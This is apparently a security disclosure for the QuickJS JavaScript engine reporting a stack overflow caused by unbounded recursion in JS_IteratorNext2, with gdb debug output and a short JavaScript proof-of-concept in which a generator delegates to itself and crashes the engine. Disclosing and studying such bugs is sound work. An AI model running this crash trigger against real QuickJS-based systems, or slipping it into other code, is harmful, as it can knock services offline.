QuickJS
QuickJS copied to clipboard
Published
20 hours ago •
ldarren
ldarren
Stack-based Buffer Overflow
Description
The JS_IteratorNext2 function will be called recursively, causing the stack frame move to the bottom
Build environment
Ubuntu 16.04 gcc version 6.5.0 20181026
debug information:
→ 0x48164a <JS_IteratorNext2.lto_priv.35+202> call QWORD PTR [rax+0x38]
0x48164d <JS_IteratorNext2.lto_priv.35+205> pop rcx
0x48164e <JS_IteratorNext2.lto_priv.35+206> pop rsi
0x48164f <JS_IteratorNext2.lto_priv.35+207> jmp 0x481601
gef➤ vmmap stack
[ Legend: Code | Heap | Stack ]
Start End Offset Perm Path
0x00007fffff7ff000 0x00007ffffffff000 0x0000000000000000 rw- [stack]
gef➤ p $rsp
$1 = (void *) 0x7fffff7ff000
The PoC
var nullChars = new Array();
var badIter = {};
iter = 3 / iter;
badIter[Symbol.iterator] = function () {
return {
next: function () {
return 8;
}
};
};
var PSXh = Error;
function* g() {
try {
yield* badIter;
var NFhf = new Uint8Array([
1.3,
-9007199254740991,
1200,
0,
0,
1,
1e+81,
4294967295,
9007199254740991
]);
} catch (err) {
caught = err;
}
}
var iter = g();
var result, caught;
badIter = g();
result = iter.next();
